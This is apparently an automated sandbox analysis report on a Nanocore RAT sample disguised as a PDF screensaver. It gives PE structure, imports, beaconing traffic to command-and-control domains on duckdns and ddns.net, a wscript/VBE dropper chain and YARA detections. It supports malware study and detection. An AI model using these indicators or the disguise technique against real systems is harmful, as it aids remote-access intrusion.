              IMAGE_DIRECTORY_ENTRY_BASERELOC0x690000x233c.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x31bdc0x31c00False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x330000xaec00xb000False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x3e0000x247200x1000False0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .didat0x630000x1900x200False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x640000x4a8c0x4c00False0.6105571546052632data6.391160230365552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x690000x233c0x2400False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              PNG0x645240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
              PNG0x6506c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
              RT_ICON0x666180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192
              RT_DIALOG0x667400x286dataEnglishUnited States
              RT_DIALOG0x669c80x13adataEnglishUnited States
              RT_DIALOG0x66b040xecdataEnglishUnited States
              RT_DIALOG0x66bf00x12edataEnglishUnited States
              RT_DIALOG0x66d200x338dataEnglishUnited States
              RT_DIALOG0x670580x252dataEnglishUnited States
              RT_STRING0x672ac0x1e2dataEnglishUnited States
              RT_STRING0x674900x1ccdataEnglishUnited States
              RT_STRING0x6765c0x1b8dataEnglishUnited States
              RT_STRING0x678140x146dataEnglishUnited States
              RT_STRING0x6795c0x46cdataEnglishUnited States
              RT_STRING0x67dc80x166dataEnglishUnited States
              RT_STRING0x67f300x152dataEnglishUnited States
              RT_STRING0x680840x10adataEnglishUnited States
              RT_STRING0x681900xbcdataEnglishUnited States
              RT_STRING0x6824c0xd6dataEnglishUnited States
              RT_GROUP_ICON0x683240x14data
              RT_MANIFEST0x683380x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
              OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
              gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Feb 3, 2023 17:52:09.616486073 CET4971460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:10.228163958 CET6070549714212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:10.918013096 CET4971460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:11.253858089 CET6070549714212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:11.918045998 CET4971460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:12.473380089 CET6070549714212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:16.750894070 CET4971760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:17.593020916 CET6070549717212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:18.106157064 CET4971760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:18.553436995 CET6070549717212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:19.215564966 CET4971760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:20.013190031 CET6070549717212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:25.434919119 CET4971960705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:25.738920927 CET6070549719212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:26.325540066 CET4971960705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:26.978645086 CET6070549719212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:27.521703959 CET4971960705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:28.055362940 CET6070549719212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:32.305283070 CET4972160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:32.739506006 CET6070549721212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:33.393497944 CET4972160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:33.869709015 CET6070549721212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:34.419946909 CET4972160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:34.984946966 CET6070549721212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:39.125330925 CET4972360705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:39.763123989 CET6070549723212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:40.264465094 CET4972360705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:41.218107939 CET6070549723212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:41.733109951 CET4972360705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:42.393220901 CET6070549723212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:46.811115026 CET4972460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:47.348661900 CET6070549724212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:48.015109062 CET4972460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:48.524660110 CET6070549724212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:49.124406099 CET4972460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:49.670073032 CET6070549724212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:53.803543091 CET4972660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:54.358467102 CET6070549726212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:54.921699047 CET4972660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:55.728024006 CET6070549726212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:56.421844959 CET4972660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:56.953017950 CET6070549726212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:02.842880964 CET4972760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:03.413187027 CET6070549727212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:04.016222954 CET4972760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:04.482964993 CET6070549727212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:05.125746012 CET4972760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:05.448577881 CET6070549727212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:09.617194891 CET4972860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:10.073801041 CET6070549728212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:10.642218113 CET4972860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:11.048384905 CET6070549728212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:11.735630035 CET4972860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:12.313384056 CET6070549728212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:16.493644953 CET4973060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:16.968214989 CET6070549730212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:17.517337084 CET4973060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:18.348334074 CET6070549730212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:18.874224901 CET4973060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:19.189841986 CET6070549730212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:23.937660933 CET4973160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:24.764730930 CET6070549731212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:25.361829042 CET4973160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:25.743491888 CET6070549731212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:26.346234083 CET4973160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:26.543648958 CET6070549731212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:30.786456108 CET4973260705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:31.345398903 CET6070549732212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:31.846702099 CET4973260705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:32.373364925 CET6070549732212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:32.878211975 CET4973260705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:33.493311882 CET6070549732212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:40.529577017 CET4973460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:40.953541994 CET6070549734212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:41.644464970 CET4973460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:42.034797907 CET6070549734212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:42.535142899 CET4973460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:43.121236086 CET6070549734212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:47.350707054 CET4973560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:47.818212032 CET6070549735212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:48.332509041 CET4973560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:48.823368073 CET6070549735212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:49.332571030 CET4973560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:49.707901955 CET6070549735212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:53.955672979 CET4973660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:54.679156065 CET6070549736212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:55.192996025 CET4973660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:55.649688959 CET6070549736212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:56.162882090 CET4973660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:56.823153973 CET6070549736212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:01.482918978 CET4973760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:01.823270082 CET6070549737212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:02.524898052 CET4973760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:02.957899094 CET6070549737212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:03.462488890 CET4973760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:04.038110971 CET6070549737212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:08.468101025 CET4973860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:08.993590117 CET6070549738212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:09.509828091 CET4973860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:09.914083004 CET6070549738212.193.30.230192.168.2.7

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Feb 3, 2023 17:52:09.443150997 CET5083553192.168.2.78.8.8.8
              Feb 3, 2023 17:52:09.550913095 CET53508358.8.8.8192.168.2.7
              Feb 3, 2023 17:52:16.610014915 CET6392653192.168.2.78.8.8.8
              Feb 3, 2023 17:52:16.726582050 CET53639268.8.8.8192.168.2.7
              Feb 3, 2023 17:52:25.314857960 CET5100753192.168.2.78.8.8.8
              Feb 3, 2023 17:52:25.424727917 CET53510078.8.8.8192.168.2.7
              Feb 3, 2023 17:52:32.281383038 CET6076553192.168.2.78.8.8.8
              Feb 3, 2023 17:52:32.303405046 CET53607658.8.8.8192.168.2.7
              Feb 3, 2023 17:52:39.102504015 CET5002453192.168.2.78.8.8.8
              Feb 3, 2023 17:52:39.124073029 CET53500248.8.8.8192.168.2.7
              Feb 3, 2023 17:52:46.786912918 CET4951653192.168.2.78.8.8.8
              Feb 3, 2023 17:52:46.806299925 CET53495168.8.8.8192.168.2.7
              Feb 3, 2023 17:52:53.769855976 CET6139253192.168.2.78.8.8.8
              Feb 3, 2023 17:52:53.789580107 CET53613928.8.8.8192.168.2.7
              Feb 3, 2023 17:53:02.823585987 CET5210453192.168.2.78.8.8.8
              Feb 3, 2023 17:53:02.841408968 CET53521048.8.8.8192.168.2.7
              Feb 3, 2023 17:53:09.590004921 CET6535653192.168.2.78.8.8.8
              Feb 3, 2023 17:53:09.609643936 CET53653568.8.8.8192.168.2.7
              Feb 3, 2023 17:53:16.469430923 CET5152653192.168.2.78.8.8.8
              Feb 3, 2023 17:53:16.487303972 CET53515268.8.8.8192.168.2.7
              Feb 3, 2023 17:53:23.915457010 CET5113953192.168.2.78.8.8.8
              Feb 3, 2023 17:53:23.933341980 CET53511398.8.8.8192.168.2.7
              Feb 3, 2023 17:53:30.759666920 CET5878453192.168.2.78.8.8.8
              Feb 3, 2023 17:53:30.779515982 CET53587848.8.8.8192.168.2.7
              Feb 3, 2023 17:53:40.419250965 CET6460853192.168.2.78.8.8.8
              Feb 3, 2023 17:53:40.527806997 CET53646088.8.8.8192.168.2.7
              Feb 3, 2023 17:53:47.239336967 CET5874653192.168.2.78.8.8.8
              Feb 3, 2023 17:53:47.348970890 CET53587468.8.8.8192.168.2.7
              Feb 3, 2023 17:53:53.936758995 CET6243353192.168.2.78.8.8.8
              Feb 3, 2023 17:53:53.954144955 CET53624338.8.8.8192.168.2.7
              Feb 3, 2023 17:54:01.462042093 CET6124853192.168.2.78.8.8.8
              Feb 3, 2023 17:54:01.481538057 CET53612488.8.8.8192.168.2.7
              Feb 3, 2023 17:54:08.436933994 CET5275053192.168.2.78.8.8.8
              Feb 3, 2023 17:54:08.458302975 CET53527508.8.8.8192.168.2.7
              Feb 3, 2023 17:54:15.322606087 CET5023153192.168.2.78.8.8.8
              Feb 3, 2023 17:54:15.342376947 CET53502318.8.8.8192.168.2.7
              Feb 3, 2023 17:54:22.567852020 CET5851453192.168.2.78.8.8.8
              Feb 3, 2023 17:54:22.587543011 CET53585148.8.8.8192.168.2.7
              Feb 3, 2023 17:54:29.466197014 CET5143653192.168.2.78.8.8.8
              Feb 3, 2023 17:54:29.579541922 CET53514368.8.8.8192.168.2.7
              Feb 3, 2023 17:54:36.820679903 CET5905353192.168.2.78.8.8.8
              Feb 3, 2023 17:54:36.838251114 CET53590538.8.8.8192.168.2.7
              Feb 3, 2023 17:54:44.068591118 CET5194553192.168.2.78.8.8.8
              Feb 3, 2023 17:54:44.086455107 CET53519458.8.8.8192.168.2.7
              Feb 3, 2023 17:54:50.906075954 CET6318753192.168.2.78.8.8.8
              Feb 3, 2023 17:54:50.928325891 CET53631878.8.8.8192.168.2.7
              Feb 3, 2023 17:54:57.821435928 CET6476053192.168.2.78.8.8.8
              Feb 3, 2023 17:54:57.844635010 CET53647608.8.8.8192.168.2.7
              Feb 3, 2023 17:55:05.101567984 CET5363753192.168.2.78.8.8.8
              Feb 3, 2023 17:55:05.210943937 CET53536378.8.8.8192.168.2.7
              Feb 3, 2023 17:55:13.758878946 CET5834353192.168.2.78.8.8.8
              Feb 3, 2023 17:55:13.865463018 CET53583438.8.8.8192.168.2.7
              Feb 3, 2023 17:55:20.557543993 CET6201853192.168.2.78.8.8.8
              Feb 3, 2023 17:55:20.577339888 CET53620188.8.8.8192.168.2.7
              Feb 3, 2023 17:55:27.259848118 CET5015553192.168.2.78.8.8.8
              Feb 3, 2023 17:55:27.279320955 CET53501558.8.8.8192.168.2.7

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Feb 3, 2023 17:52:09.443150997 CET192.168.2.78.8.8.80xebe5Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:16.610014915 CET192.168.2.78.8.8.80x5828Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:25.314857960 CET192.168.2.78.8.8.80x3e16Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:32.281383038 CET192.168.2.78.8.8.80x5585Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:39.102504015 CET192.168.2.78.8.8.80x1074Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:46.786912918 CET192.168.2.78.8.8.80xc899Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:53.769855976 CET192.168.2.78.8.8.80x1b1fStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:02.823585987 CET192.168.2.78.8.8.80x4c8eStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:09.590004921 CET192.168.2.78.8.8.80x2d8cStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:16.469430923 CET192.168.2.78.8.8.80x8848Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:23.915457010 CET192.168.2.78.8.8.80x297bStandard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:30.759666920 CET192.168.2.78.8.8.80xc6ecStandard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:40.419250965 CET192.168.2.78.8.8.80xda46Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:47.239336967 CET192.168.2.78.8.8.80xa48Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:53.936758995 CET192.168.2.78.8.8.80x13d7Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:01.462042093 CET192.168.2.78.8.8.80xfc42Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:08.436933994 CET192.168.2.78.8.8.80x3b17Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:15.322606087 CET192.168.2.78.8.8.80x4790Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:22.567852020 CET192.168.2.78.8.8.80x2a56Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:29.466197014 CET192.168.2.78.8.8.80xb3aeStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:36.820679903 CET192.168.2.78.8.8.80x62adStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:44.068591118 CET192.168.2.78.8.8.80x2ae6Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:50.906075954 CET192.168.2.78.8.8.80x9387Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:57.821435928 CET192.168.2.78.8.8.80xfa40Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:05.101567984 CET192.168.2.78.8.8.80x1982Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:13.758878946 CET192.168.2.78.8.8.80xb7d7Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:20.557543993 CET192.168.2.78.8.8.80x53ecStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:27.259848118 CET192.168.2.78.8.8.80x4cb8Standard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Feb 3, 2023 17:52:09.550913095 CET8.8.8.8192.168.2.70xebe5No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:16.726582050 CET8.8.8.8192.168.2.70x5828No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:25.424727917 CET8.8.8.8192.168.2.70x3e16No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:32.303405046 CET8.8.8.8192.168.2.70x5585No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:39.124073029 CET8.8.8.8192.168.2.70x1074No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:46.806299925 CET8.8.8.8192.168.2.70xc899No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:52:53.789580107 CET8.8.8.8192.168.2.70x1b1fNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:02.841408968 CET8.8.8.8192.168.2.70x4c8eNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:09.609643936 CET8.8.8.8192.168.2.70x2d8cNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:16.487303972 CET8.8.8.8192.168.2.70x8848No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:23.933341980 CET8.8.8.8192.168.2.70x297bNo error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:30.779515982 CET8.8.8.8192.168.2.70xc6ecNo error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:40.527806997 CET8.8.8.8192.168.2.70xda46No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:47.348970890 CET8.8.8.8192.168.2.70xa48No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:53:53.954144955 CET8.8.8.8192.168.2.70x13d7No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:01.481538057 CET8.8.8.8192.168.2.70xfc42No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:08.458302975 CET8.8.8.8192.168.2.70x3b17No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:15.342376947 CET8.8.8.8192.168.2.70x4790No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:22.587543011 CET8.8.8.8192.168.2.70x2a56No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:29.579541922 CET8.8.8.8192.168.2.70xb3aeNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:36.838251114 CET8.8.8.8192.168.2.70x62adNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:44.086455107 CET8.8.8.8192.168.2.70x2ae6No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:50.928325891 CET8.8.8.8192.168.2.70x9387No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:54:57.844635010 CET8.8.8.8192.168.2.70xfa40No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:05.210943937 CET8.8.8.8192.168.2.70x1982No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:13.865463018 CET8.8.8.8192.168.2.70xb7d7No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:20.577339888 CET8.8.8.8192.168.2.70x53ecNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
              Feb 3, 2023 17:55:27.279320955 CET8.8.8.8192.168.2.70x4cb8No error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:17:51:27
              Start date:03/02/2023
              Path:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              Imagebase:0x3d0000
              File size:1181640 bytes
              MD5 hash:3AC05BBE35293FBFD0DF49ECFB34C461
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Target ID:1
              Start time:17:51:39
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
              Imagebase:0xd10000
              File size:147456 bytes
              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:6
              Start time:17:51:49
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
